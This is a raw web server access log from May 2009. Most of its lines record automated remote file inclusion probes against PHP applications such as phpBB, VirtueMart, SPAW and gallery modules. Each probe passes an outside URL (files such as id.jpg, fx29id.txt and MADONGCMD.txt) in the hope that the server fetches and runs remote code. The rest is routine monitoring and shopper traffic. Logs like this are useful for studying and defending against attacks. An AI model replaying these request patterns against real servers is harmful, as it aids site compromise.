110.45.146.146 - - [25/May/2009:00:32:57 -0400] "GET /errors.php?error=http://maehongson.nfe.go.th/budget3/image/id.jpg??? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
110.45.146.88 - - [25/May/2009:00:33:00 -0400] "GET /logs/access_log.Q108121400/errors.php?error=http://maehongson.nfe.go.th/budget3/image/id.jpg??? HTTP/1.1" 404 235 "-" "libwww-perl/5.65"
110.45.146.88 - - [25/May/2009:00:33:00 -0400] "GET /logs/errors.php?error=http://maehongson.nfe.go.th/budget3/image/id.jpg??? HTTP/1.1" 404 213 "-" "libwww-perl/5.65"
110.45.146.88 - - [25/May/2009:00:33:00 -0400] "GET /errors.php?error=http://maehongson.nfe.go.th/budget3/image/id.jpg??? HTTP/1.1" 404 208 "-" "libwww-perl/5.65"
67.15.188.3 - - [25/May/2009:00:33:09 -0400] "GET /logs/access_log.Q108091400//vwar/backup/errors.php?error=http://reklama-gorod.ru//assets/export/fx29id.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
67.15.188.3 - - [25/May/2009:00:33:36 -0400] "GET /logs/access_log.Q109051000//vwar/backup/errors.php?error=http://reklama-gorod.ru//assets/export/fx29id.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
67.15.188.3 - - [25/May/2009:00:33:57 -0400] "GET /logs/access_log.Q109051000//vwar/backup/errors.php?error=http://reklama-gorod.ru//assets/export/fx29id.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
88.191.103.144 - - [25/May/2009:00:34:30 -0400] "GET /logs/error_log.Q108102800//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 270 "-" "libwww-perl/5.825"
88.191.103.144 - - [25/May/2009:00:34:30 -0400] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 244 "-" "libwww-perl/5.825"
88.191.103.144 - - [25/May/2009:00:34:30 -0400] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.825"
88.84.128.40 - - [25/May/2009:00:34:33 -0400] "GET /logs/error_log.Q108102800//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 270 "-" "libwww-perl/5.803"
88.84.128.40 - - [25/May/2009:00:34:33 -0400] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 244 "-" "libwww-perl/5.803"
88.84.128.40 - - [25/May/2009:00:34:33 -0400] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.803"
209.59.12.99 - - [25/May/2009:00:35:15 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
88.191.103.144 - - [25/May/2009:00:36:16 -0400] "GET /logs/access_log.Q109051100//modules/My_eGallery/public/displayCategory.php?basepath=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 272 "-" "libwww-perl/5.825"
88.191.103.144 - - [25/May/2009:00:36:16 -0400] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.825"
88.191.103.144 - - [25/May/2009:00:36:16 -0400] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.825"
222.122.49.5 - - [25/May/2009:00:36:21 -0400] "GET /errors.php?error=http://maehongson.nfe.go.th/budget3/image/id.jpg??? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
222.122.49.5 - - [25/May/2009:00:36:21 -0400] "GET /logs/errors.php?error=http://maehongson.nfe.go.th/budget3/image/id.jpg??? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
222.122.49.5 - - [25/May/2009:00:36:21 -0400] "GET /logs/error_log.Q109050500/errors.php?error=http://maehongson.nfe.go.th/budget3/image/id.jpg??? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
222.122.49.5 - - [25/May/2009:00:36:39 -0400] "GET /logs/access_log.Q108082000/errors.php?error=http://maehongson.nfe.go.th/budget3/image/id.jpg??? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
222.122.49.5 - - [25/May/2009:00:36:39 -0400] "GET /errors.php?error=http://maehongson.nfe.go.th/budget3/image/id.jpg??? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
222.122.49.5 - - [25/May/2009:00:36:40 -0400] "GET /logs/errors.php?error=http://maehongson.nfe.go.th/budget3/image/id.jpg??? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
222.122.49.5 - - [25/May/2009:00:36:43 -0400] "GET /logs/error_log.Q108082800//include/admin.lib.inc.php?site_path=http://maehongson.nfe.go.th/budget3/image/id.jpg??? HTTP/1.1" 404 250 "-" "libwww-perl/5.79"
110.45.146.88 - - [25/May/2009:00:37:01 -0400] "GET /errors.php?error=http://maehongson.nfe.go.th/budget3/image/id.jpg??? HTTP/1.1" 404 208 "-" "libwww-perl/5.65"
110.45.146.88 - - [25/May/2009:00:37:01 -0400] "GET /logs/error_log.Q109050500/errors.php?error=http://maehongson.nfe.go.th/budget3/image/id.jpg??? HTTP/1.1" 404 234 "-" "libwww-perl/5.65"
110.45.146.88 - - [25/May/2009:00:37:01 -0400] "GET /logs/errors.php?error=http://maehongson.nfe.go.th/budget3/image/id.jpg??? HTTP/1.1" 404 213 "-" "libwww-perl/5.65"
70.38.31.50 - - [25/May/2009:00:37:12 -0400] "GET /logs/access_log.Q109051800//components/com_flyspray/startdown.php?file=http://feiwu-au.tw/appserv/AUTHORS.txt%0D?? HTTP/1.1" 404 263 "-" "libwww-perl/5.805"
70.38.31.50 - - [25/May/2009:00:37:12 -0400] "GET //components/com_flyspray/startdown.php?file=http://feiwu-au.tw/appserv/AUTHORS.txt%0D?? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
70.38.31.50 - - [25/May/2009:00:37:12 -0400] "GET /logs//components/com_flyspray/startdown.php?file=http://feiwu-au.tw/appserv/AUTHORS.txt%0D?? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
70.38.31.50 - - [25/May/2009:00:37:12 -0400] "GET /logs/access_log.Q109051100//components/com_flyspray/startdown.php?file=http://feiwu-au.tw/appserv/AUTHORS.txt%0D?? HTTP/1.1" 404 263 "-" "libwww-perl/5.805"
110.45.146.146 - - [25/May/2009:00:37:24 -0400] "GET /logs/error_log.Q109050500/errors.php?error=http://maehongson.nfe.go.th/budget3/image/id.jpg??? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
110.45.146.146 - - [25/May/2009:00:37:25 -0400] "GET /errors.php?error=http://maehongson.nfe.go.th/budget3/image/id.jpg??? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
110.45.146.146 - - [25/May/2009:00:37:25 -0400] "GET /logs/errors.php?error=http://maehongson.nfe.go.th/budget3/image/id.jpg??? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
110.45.146.88 - - [25/May/2009:00:37:32 -0400] "GET /logs/access_log.Q109021500//include/write.php?dir=http://maehongson.nfe.go.th/budget3/image/id.jpg??? HTTP/1.1" 404 243 "-" "libwww-perl/5.65"
110.45.146.88 - - [25/May/2009:00:37:32 -0400] "GET /logs//include/write.php?dir=http://maehongson.nfe.go.th/budget3/image/id.jpg??? HTTP/1.1" 404 221 "-" "libwww-perl/5.65"
110.45.146.88 - - [25/May/2009:00:37:33 -0400] "GET //include/write.php?dir=http://maehongson.nfe.go.th/budget3/image/id.jpg??? HTTP/1.1" 404 216 "-" "libwww-perl/5.65"
110.45.146.88 - - [25/May/2009:00:37:37 -0400] "GET /logs/access_log.Q109051800//include/write.php?dir=http://maehongson.nfe.go.th/budget3/image/id.jpg??? HTTP/1.1" 404 243 "-" "libwww-perl/5.65"
222.239.76.25 - - [25/May/2009:00:38:27 -0400] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
222.239.76.25 - - [25/May/2009:00:38:27 -0400] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
78.40.224.155 - - [25/May/2009:00:38:56 -0400] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
78.40.224.155 - - [25/May/2009:00:38:56 -0400] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
78.40.224.155 - - [25/May/2009:00:38:56 -0400] "GET /logs/access_log.Q108122000%20%20//modules/4nAlbum/public/displayCategory.php?basepath=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
78.40.224.155 - - [25/May/2009:00:38:56 -0400] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
78.40.224.155 - - [25/May/2009:00:38:56 -0400] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
78.40.224.155 - - [25/May/2009:00:38:56 -0400] "GET /logs/access_log.Q108122000%20%20//modules/4nAlbum/public/displayCategory.php?basepath=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
221.139.50.3 - - [25/May/2009:00:39:19 -0400] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
221.139.50.3 - - [25/May/2009:00:39:19 -0400] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
110.45.146.88 - - [25/May/2009:00:39:55 -0400] "GET /logs/error_log.Q108052600/errors.php?error=http://maehongson.nfe.go.th/budget3/image/id.jpg??? HTTP/1.1" 404 234 "-" "libwww-perl/5.65"
110.45.146.146 - - [25/May/2009:00:40:08 -0400] "GET /logs/error_log.Q108052600/errors.php?error=http://maehongson.nfe.go.th/budget3/image/id.jpg??? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
209.59.12.99 - - [25/May/2009:00:40:15 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
221.139.50.3 - - [25/May/2009:00:40:43 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
221.139.50.3 - - [25/May/2009:00:40:43 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
221.139.50.3 - - [25/May/2009:00:40:43 -0400] "GET /logs/access_log.Q109042200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
88.84.128.40 - - [25/May/2009:00:40:52 -0400] "GET /logs/access_log.Q109051100//modules/My_eGallery/public/displayCategory.php?basepath=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 272 "-" "libwww-perl/5.803"
88.84.128.40 - - [25/May/2009:00:40:52 -0400] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.803"
88.84.128.40 - - [25/May/2009:00:40:53 -0400] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.803"
221.139.50.3 - - [25/May/2009:00:41:12 -0400] "GET /logs/access_log.Q109050300///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
94.23.23.219 - - [25/May/2009:00:42:58 -0400] "GET /errors.php?error=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
94.23.23.219 - - [25/May/2009:00:42:58 -0400] "GET /logs/errors.php?error=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
94.23.23.219 - - [25/May/2009:00:43:18 -0400] "GET /errors.php?error=http://kecomang.webng.com/id.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
94.23.23.219 - - [25/May/2009:00:43:18 -0400] "GET /logs/errors.php?error=http://kecomang.webng.com/id.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
110.45.146.88 - - [25/May/2009:00:43:27 -0400] "GET /logs/error_log.Q109042700//admin/spaw/spaw_control.class.php?spaw_root=http://maehongson.nfe.go.th/budget3/image/id.jpg??? HTTP/1.1" 404 258 "-" "libwww-perl/5.65"
110.45.146.146 - - [25/May/2009:00:43:35 -0400] "GET /logs/error_log.Q109042700//admin/spaw/spaw_control.class.php?spaw_root=http://maehongson.nfe.go.th/budget3/image/id.jpg??? HTTP/1.1" 404 258 "-" "libwww-perl/5.79"
110.45.146.146 - - [25/May/2009:00:43:48 -0400] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://maehongson.nfe.go.th/budget3/image/id.jpg??? HTTP/1.1" 404 232 "-" "libwww-perl/5.79"
110.45.146.146 - - [25/May/2009:00:43:48 -0400] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://maehongson.nfe.go.th/budget3/image/id.jpg??? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
110.45.146.146 - - [25/May/2009:00:43:53 -0400] "GET /logs/error_log.Q109050500//admin/spaw/spaw_control.class.php?spaw_root=http://maehongson.nfe.go.th/budget3/image/id.jpg??? HTTP/1.1" 404 258 "-" "libwww-perl/5.79"
110.45.146.88 - - [25/May/2009:00:43:55 -0400] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://maehongson.nfe.go.th/budget3/image/id.jpg??? HTTP/1.1" 404 237 "-" "libwww-perl/5.65"
110.45.146.88 - - [25/May/2009:00:43:55 -0400] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://maehongson.nfe.go.th/budget3/image/id.jpg??? HTTP/1.1" 404 232 "-" "libwww-perl/5.65"
110.45.146.88 - - [25/May/2009:00:43:55 -0400] "GET /logs/error_log.Q109050500//admin/spaw/spaw_control.class.php?spaw_root=http://maehongson.nfe.go.th/budget3/image/id.jpg??? HTTP/1.1" 404 258 "-" "libwww-perl/5.65"
207.216.198.68 - - [25/May/2009:00:44:13 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 2.0.50727; .NET CLR 1.1.4322; Media Center PC 4.0)"
207.216.198.68 - - [25/May/2009:00:44:13 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS%20(S0040):0 HTTP/1.1" 200 56583 "http://www.acesurgical.com/ubs.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 2.0.50727; .NET CLR 1.1.4322; Media Center PC 4.0)"
207.216.198.68 - - [25/May/2009:00:44:14 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 2.0.50727; .NET CLR 1.1.4322; Media Center PC 4.0)"
207.216.198.68 - - [25/May/2009:00:44:14 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 2.0.50727; .NET CLR 1.1.4322; Media Center PC 4.0)"
207.216.198.68 - - [25/May/2009:00:44:15 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 2.0.50727; .NET CLR 1.1.4322; Media Center PC 4.0)"
207.216.198.68 - - [25/May/2009:00:44:15 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 2.0.50727; .NET CLR 1.1.4322; Media Center PC 4.0)"
207.216.198.68 - - [25/May/2009:00:44:15 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 2.0.50727; .NET CLR 1.1.4322; Media Center PC 4.0)"
207.216.198.68 - - [25/May/2009:00:44:15 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 2.0.50727; .NET CLR 1.1.4322; Media Center PC 4.0)"
207.216.198.68 - - [25/May/2009:00:44:15 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 2.0.50727; .NET CLR 1.1.4322; Media Center PC 4.0)"
207.216.198.68 - - [25/May/2009:00:44:15 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 2.0.50727; .NET CLR 1.1.4322; Media Center PC 4.0)"
207.216.198.68 - - [25/May/2009:00:44:16 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 2.0.50727; .NET CLR 1.1.4322; Media Center PC 4.0)"
207.216.198.68 - - [25/May/2009:00:44:16 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 2.0.50727; .NET CLR 1.1.4322; Media Center PC 4.0)"
207.216.198.68 - - [25/May/2009:00:44:16 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 2.0.50727; .NET CLR 1.1.4322; Media Center PC 4.0)"
207.216.198.68 - - [25/May/2009:00:44:16 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 2.0.50727; .NET CLR 1.1.4322; Media Center PC 4.0)"
207.216.198.68 - - [25/May/2009:00:44:16 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 2.0.50727; .NET CLR 1.1.4322; Media Center PC 4.0)"
207.216.198.68 - - [25/May/2009:00:44:16 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 2.0.50727; .NET CLR 1.1.4322; Media Center PC 4.0)"
207.216.198.68 - - [25/May/2009:00:44:16 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 2.0.50727; .NET CLR 1.1.4322; Media Center PC 4.0)"
207.216.198.68 - - [25/May/2009:00:44:17 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 2.0.50727; .NET CLR 1.1.4322; Media Center PC 4.0)"
207.216.198.68 - - [25/May/2009:00:44:17 -0400] "GET /images/pf-a.gif HTTP/1.1" 200 798 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 2.0.50727; .NET CLR 1.1.4322; Media Center PC 4.0)"
207.216.198.68 - - [25/May/2009:00:44:17 -0400] "GET /images/items/2881000_THUMB.JPG HTTP/1.1" 200 3673 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 2.0.50727; .NET CLR 1.1.4322; Media Center PC 4.0)"
207.216.198.68 - - [25/May/2009:00:44:17 -0400] "GET /images/space.gif HTTP/1.1" 200 43 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 2.0.50727; .NET CLR 1.1.4322; Media Center PC 4.0)"
207.216.198.68 - - [25/May/2009:00:44:17 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 2.0.50727; .NET CLR 1.1.4322; Media Center PC 4.0)"
207.216.198.68 - - [25/May/2009:00:44:17 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 2.0.50727; .NET CLR 1.1.4322; Media Center PC 4.0)"
207.216.198.68 - - [25/May/2009:00:44:18 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 2.0.50727; .NET CLR 1.1.4322; Media Center PC 4.0)"
207.216.198.68 - - [25/May/2009:00:44:18 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 2.0.50727; .NET CLR 1.1.4322; Media Center PC 4.0)"
207.216.198.68 - - [25/May/2009:00:44:18 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 2.0.50727; .NET CLR 1.1.4322; Media Center PC 4.0)"
207.216.198.68 - - [25/May/2009:00:44:18 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 2.0.50727; .NET CLR 1.1.4322; Media Center PC 4.0)"
207.216.198.68 - - [25/May/2009:00:44:18 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 2.0.50727; .NET CLR 1.1.4322; Media Center PC 4.0)"
